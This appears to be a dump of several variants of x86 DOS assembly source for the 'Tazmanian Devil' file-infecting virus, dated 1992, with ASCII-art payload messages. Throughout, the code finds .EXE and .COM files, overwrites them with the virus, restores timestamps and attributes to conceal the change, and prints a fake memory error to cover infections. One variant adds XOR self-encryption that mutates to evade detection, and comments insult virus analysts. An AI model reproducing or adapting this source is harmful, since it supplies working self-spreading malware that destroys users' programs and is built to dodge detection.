virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
|
||||
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
|
||||
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
|
||||
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
|
||||
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
|
||||
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
|
||||
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
|
||||
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
|
||||
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
|
||||
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
|
||||
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
|
||||
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,4 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,16 ; Are at least 16 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,238 @@
|
|||
cr equ 13 ; Carriage return ASCII code
|
||||
lf equ 10 ; Linefeed ASCII code
|
||||
tab equ 9 ; Tab ASCII code
|
||||
virus_size equ 2209 ; Size of the virus file
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
main proc near ; Code execution begins here
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
ret ; Go back to where you came from
|
||||
|
||||
|
||||
virus_code:
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
|
||||
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
|
||||
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
|
||||
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
|
||||
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
|
||||
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
|
||||
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
|
||||
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
|
||||
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
|
||||
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
|
||||
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
|
||||
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
|
||||
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
|
||||
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
|
||||
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
|
||||
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
|
||||
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
|
||||
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
|
||||
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
|
||||
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,30 ; Is it less than 30 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,4 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,2 ; Are at least 2 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,278 @@
|
|||
cr equ 13 ; This VIRUS was written 12-14-1992
|
||||
lf equ 10 ; AND QUIT READING MY SOURCE CODE
|
||||
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
|
||||
virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
;---------------------------------------------------------------------
|
||||
; All executable code is contained in boundaries of procedure "main".
|
||||
; The following code, until the start of "virus_code", is the non-
|
||||
; encrypted CMT portion of the code to load up the real program.
|
||||
;---------------------------------------------------------------------
|
||||
main proc near ; Code execution begins here
|
||||
call encrypt_decrypt ; Decrypt the real virus code
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
; ---------- Encrypt, save, and restore the virus code -----------
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
call encrypt_decrypt ; Encrypt most of the code
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
call encrypt_decrypt ; Restore the code as it was
|
||||
ret ; Go back to where you came from
|
||||
|
||||
; --------------- Encrypt or decrypt the virus code ----------------
|
||||
encrypt_decrypt:
|
||||
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
||||
xor_loop: ; Start cycle here
|
||||
mov ah,[bx] ; Get the current byte
|
||||
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
|
||||
mov [bx],ah ; Put it back where we got it
|
||||
inc bx ; Move BX ahead a byte
|
||||
cmp bx,offset virus_code+virus_size ; Are we at the end?
|
||||
jle xor_loop ; If not, do another cycle
|
||||
ret ; and go back where we came from
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; The rest of the code from here on remains encrypted until run-time,
|
||||
; using a fundamental XOR technique that changes via CMT.
|
||||
;-----------------------------------------------------------------------
|
||||
virus_code:
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; All strings are kept here in the file, and automatically encrypted.
|
||||
; Please don't be a lamer and change the strings and say you wrote a virus.
|
||||
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
||||
; changes, even when the strings stay the same.
|
||||
;----------------------------------------------------------------------------
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Program too big to fit in memory $"
|
||||
virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND Âô<C383> W<>’sˆl!!* $"
|
||||
virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHÜÜÜßÜÛÛÛÜADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
|
||||
virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH AÜÛßÜßÛßÜßÛÛÜÛÜ ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
|
||||
virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜDH ADH ADH ÛÛÛÛÛ ÛÛ ÛÛÛÛÛADH $"
|
||||
virus_msg5 db cr,lf,"ADH ADH ADH ADßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ ADH ADH ADÛ ADÛ AÛH ADÛ ADH $"
|
||||
virus_msg6 db cr,lf,"ADH ADH ADH AÛÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßßH ADH ADÛ ADÛÛÛÛH AÛH ADH $"
|
||||
virus_msg7 db cr,lf,"ADH ADH ADH ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ ÜADH ADÛ ADÛ AÛH ÛDH ADH $"
|
||||
virus_msg8 db cr,lf,"ADH ADH ADHÜ ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜH ADÛ ADÛ AÛHÛÛÛÛÛADH $"
|
||||
virus_msg9 db cr,lf,"ADH ADH ADÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜADH ADH ADH ADH ADH $"
|
||||
virus_msg10 db cr,lf,"ADH ADH AÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ADH ADH $"
|
||||
virus_msg11 db cr,lf,"ADH ADH ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ ADH ADH ADH ADH$"
|
||||
virus_msg12 db cr,lf,"ADH ADHÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛAÜÜÛÛÛÛÛÛÛÛÜADH ADH ADH ADH$"
|
||||
virus_msg13 db cr,lf,"ADH ADÛÛÜÜÛÛÛÝH ADÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝH ADH ADH ADH$"
|
||||
virus_msg14 db cr,lf,"ADH ADÞÛÜßÛÛÛÛÛÛADHÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ Aßß ÜÛÛÛÛÛÝßßDH ADH ADH ADH$"
|
||||
virus_msg15 db cr,lf,"ADH ADHßßÜÛÜÜßß ADH ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛßH ADHÛÛÛÝÞÛÛÛ ADH ADH ADH ADH$"
|
||||
virus_msg16 db cr,lf,"ADH ADH ADH ADHÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜH ADH ADH ADH ADH AHD ADH$"
|
||||
virus_msg17 db cr,lf,"ADH ADH ADH ADßÛÛÛÛÛßßß ADH ßßÛÛÛÛÛÛÛÛHßÛÛÛÛÛÛÜ ADH ADH ADH ADH ADH ADH$"
|
||||
virus_msg18 db cr,lf,"ADH ÜÜÛÛÛÜÜ ADH ßÛÛÛÛÜH ADH ADßßßßßßßDH ÜÛÛÛÛÛÛÛADH ADH ADH ADH ADH ADH$"
|
||||
virus_msg19 db cr,lf,"ADÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜADH ADH ADH AÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜDH ADH ADH ADH$"
|
||||
virus_msg20 db cr,lf,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ ADH ADH ADH$"
|
||||
